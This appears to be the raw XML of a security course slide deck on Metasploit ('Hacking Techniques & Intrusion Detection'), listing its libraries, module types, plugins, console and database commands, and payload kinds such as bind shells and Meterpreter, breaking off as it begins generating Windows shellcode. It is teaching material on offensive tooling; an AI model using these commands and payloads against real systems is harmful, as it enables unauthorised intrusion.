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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="376" r:id="rId2"/>
    <p:sldId id="377" r:id="rId3"/>
    <p:sldId id="378" r:id="rId4"/>
    <p:sldId id="319" r:id="rId5"/>
    <p:sldId id="370" r:id="rId6"/>
    <p:sldId id="316" r:id="rId7"/>
    <p:sldId id="289" r:id="rId8"/>
    <p:sldId id="332" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="330" r:id="rId11"/>
    <p:sldId id="331" r:id="rId12"/>
    <p:sldId id="325" r:id="rId13"/>
    <p:sldId id="326" r:id="rId14"/>
    <p:sldId id="371" r:id="rId15"/>
    <p:sldId id="372" r:id="rId16"/>
    <p:sldId id="373" r:id="rId17"/>
    <p:sldId id="343" r:id="rId18"/>
    <p:sldId id="344" r:id="rId19"/>
    <p:sldId id="345" r:id="rId20"/>
    <p:sldId id="334" r:id="rId21"/>
    <p:sldId id="335" r:id="rId22"/>
    <p:sldId id="336" r:id="rId23"/>
    <p:sldId id="338" r:id="rId24"/>
    <p:sldId id="340" r:id="rId25"/>
    <p:sldId id="346" r:id="rId26"/>
    <p:sldId id="355" r:id="rId27"/>
    <p:sldId id="349" r:id="rId28"/>
    <p:sldId id="347" r:id="rId29"/>
    <p:sldId id="348" r:id="rId30"/>
    <p:sldId id="350" r:id="rId31"/>
    <p:sldId id="351" r:id="rId32"/>
    <p:sldId id="352" r:id="rId33"/>
    <p:sldId id="363" r:id="rId34"/>
    <p:sldId id="357" r:id="rId35"/>
    <p:sldId id="358" r:id="rId36"/>
    <p:sldId id="364" r:id="rId37"/>
    <p:sldId id="368" r:id="rId38"/>
    <p:sldId id="369" r:id="rId39"/>
    <p:sldId id="367" r:id="rId40"/>
    <p:sldId id="374" r:id="rId41"/>
    <p:sldId id="366" r:id="rId42"/>
    <p:sldId id="342" r:id="rId43"/>
    <p:sldId id="274" r:id="rId44"/>
    <p:sldId id="375" r:id="rId45"/>
    <p:sldId id="310" r:id="rId46"/>
    <p:sldId id="365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3" autoAdjust="0"/>
    <p:restoredTop sz="86381" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="55" d="100"/>
          <a:sy n="55" d="100"/>
        </p:scale>
        <p:origin x="-15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5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7C024-0D3A-4BD4-B289-269F05CC13FA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7099B-B872-4110-82AC-A48C55F089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19A28-66FC-44D6-AEF3-C1C52B12C1A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FB4438-FF1F-49B5-8136-E8921E8F6799}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2344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19A28-66FC-44D6-AEF3-C1C52B12C1A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17E-DB6D-4C11-8B3E-E4B09652CFB3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0EB2D-1BBC-472B-BD3E-B585FFA6A70B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D5D1-5D9B-4674-A9A4-C1ADC4A74225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DCF6-00C1-4FDB-97AD-599D3FAC97AE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F08A-D9B6-4E68-87E6-39C99518DC9E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A597-C3FD-4AA8-9F86-9A03E0721A4F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3F3E-1CFA-4863-BA19-8762BA007B1E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114D-1E68-4FD2-BC0D-CE13066E77D0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F522-887B-41E7-8A36-49BFD7A025DD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4BE6-4422-4CFC-845A-9CF8A16422C8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22478-BCE1-426A-94DB-63AB357E0EE7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62121-82ED-4FFE-AA28-D20883A27E56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rkoperator.com/blog/2011/12/15/metasploit-pentest-plugin-part-1.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.offensive-security.com/metasploit-unleashed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mmunity.rapid7.com/community/metasploit/blog/2013/01/08/free-metasploit-penetration-testing-lab-in-the-cloud" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stephenfewer/ReflectiveDLLInjection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.darkoperator.com/blog/2012/1/29/metasploit-pentest-plugin-part-2.html" TargetMode="Externa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indows-commandline.com/2009/07/start-security-center-service-from.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.virustotal.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.metasploit.com/redmine/projects/framework/wiki/Railgun" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fastandeasyhacking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rianbondy.com/blog/id/100/understanding-windows-at-a-deeper-level-sessions-window-stations-and-desktops" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikibooks.org/wiki/MetasploitUnderstanding" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://schierlm.users.sourceforge.net/avevasion.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.com/files/11928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Hacking Techniques &amp; Intrusion Detection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>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/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Ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Al-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shemery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arabnix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [at] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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MSF Libraries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Rex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(Ruby Extension Library):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Provides Sockets, protocols, text transformations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msf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::Core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(Core library /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msfcore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enables exploits, sessions, and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plugins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to interact with the different interfaces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msf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::Base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(Base library /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msfbase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provides wrapper routines and utility classes that you can use to easily work with the Core library.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Metasploit</a:t>
            </a:r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MSFconsole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 interactive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MSFcli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 scripting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MSFweb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 as the name implies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MSFgui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 java based GUI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and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Armitage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 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interactive GUI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MSF Modules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Core components of MSF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A piece of software that can perform a specific action. (ex: exploitation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fuzzing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, and scanning).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Modules are found in the following directory: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&lt;installation-directory&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>metasploit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/msf3/modules.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Categorized by type and then by protocol.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MSF Modules include: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Exploit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Auxiliary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Post-Exploitation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Payload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NOP generator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Payload encoder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MSF Utilities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MSFpayload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Generate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shellcode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and executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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MSFencode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Alter payloads so that the original payload does not contain any bad characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Msfvenom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Combination of both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MSFpayload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and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MSFencode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which provides standard CLI options and increased speed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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MSF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Plugins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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Plugins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work directly with the API.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Manipulate the framework as a whole.</a:t>
            </a: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Plugins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hook into the event subsystem.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Automate specific tasks which would be tedious to do manually.</a:t>
            </a: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Plugins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only work in the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msfconsole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.</a:t>
            </a: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Plugins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can add new console commands.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Extend the MSF functionality.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MSF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Plugins</a:t>
            </a:r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–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msfd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 Daemon to share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msf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 instance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openvas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nessus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nexpose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vulnerability scanners</a:t>
            </a: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pcap_log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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pcap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packet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intercepter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socket_logger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 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hook all created sockets by an exploit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Others (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BTW, why not add yours?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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DarkOperator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has some great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plugins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too (check the ref. page).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MSF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Plugins</a:t>
            </a:r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–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Load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plugin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using the load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cli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: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load &lt;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plugin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-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a: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 &gt; load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pcap_log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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rgbClr val="FFFF00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Unload a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plugin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using the unload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cli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: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unload &lt;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plugin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-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a: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 &gt; unload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pcap_log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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MSF Core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help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list available commands</a:t>
            </a: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info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get more info about a module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search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  search for specific module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search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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tag:keyword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  search using keyword tag expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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	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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>platform:windows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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> &lt;string&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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show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, OR be specific </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploits|post|nops|payloads|auxiliary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 ]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show target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view a list of platforms that the module supports</a:t>
            </a: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MSF Core Commands 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connect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similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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back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switch between context</a:t>
            </a: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jobs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display/manage jobs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kill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end a specific job</a:t>
            </a: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use &lt;module-name&gt;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use a module</a:t>
            </a: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show options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check module options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show advanced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check module advanced options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set &lt;option&gt; &lt;value&gt;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setting module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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config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 value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>set exploit &lt;exploit-name&gt;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exploit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  run the module</a:t>
            </a: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MSF Core Commands - 3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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>irb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run live ruby interpreter</a:t>
            </a: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load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load an MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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plugin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pP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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>pcap_log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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route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  route traffic through a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pP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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	route [add/remove/get/flush/print] subnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netmask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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>comm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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sid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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>]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sessions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 list, configure, and close a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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setg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set a global variable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save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  saves the active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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datastore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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unset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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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unsetg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unset a variable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exit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exit MSF</a:t>
            </a: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ln/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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All materials is licensed under a Creative Commons “Share Alike” license.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85800" y="13716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400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>http://creativecommons.org/licenses/by-sa/3.0/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endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="80" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="80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049463"/>
            <a:ext cx="6324600" cy="473233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72DF-3A8E-450B-81DD-4572783072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MSF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MSF provides back end database support for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PostgreSQL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DB stores information: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host data, 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evidence, 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and exploit results.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MSF DB Basic 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db_connect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Connect to an existing database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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db_disconnect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D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isconnect from the current db instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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db_export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Export a file containing the contents of the db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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db_import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Import a scan result file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>check doc for supported file types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db_nmap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E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xecutes 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nmap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and records the output automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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db_status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Show the current database status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hosts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List all hosts in the database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services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List all services in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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vulns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List all vulnerabilities in the database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workspace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Switch between database workspaces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DB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If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posgress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isn’t installed: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# </a:t>
            </a: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gem install pg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Connecting to the DB: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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>db_connect</a:t>
            </a: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 -y /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>config</a:t>
            </a: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/database.yml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Workspace helps you segment your work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# </a:t>
            </a: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workspace -a NAME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Adding/Deleting a Host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# </a:t>
            </a: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hosts –a / hosts -d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Auxiliary Modules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Auxiliaries are categorized by type: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Administrative (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admin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Cracking (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analyze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NAT (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bnat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Denial of Service (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dos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 lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Fuzzers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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fuzzers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Network services (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server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Others: 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client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crawler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gather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sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pdf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sniffer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sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vsploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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4953000" y="2133600"/>
            <a:ext cx="39624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Scanners (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scanner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Spoofing (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spoof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SQLi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(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sqli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VoIP (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voip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Payloads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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Singles</a:t>
            </a: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</a:t>
            </a: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completely standalone. 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Add user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pP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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Stagers</a:t>
            </a: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creates the network connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pP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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Stages</a:t>
            </a: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 downloaded by Stagers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1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Meterpreter</a:t>
            </a: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If represented by '/' in the payload name, then payload is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Staged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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp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single payload, with no stage!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windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bind_tcp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 stager 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bind_tcp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 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 stage (shell).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Payloads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Inline (Non Staged)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Staged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PassiveX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NoNX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ord</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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IPv6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Reflective DLL injection</a:t>
            </a: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Generating Shellcode using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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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  <a:buNone/>
            </a:pP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msf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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>use payload/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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None/>
            </a:pP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msf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 payload(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shell_bind_tcp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) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
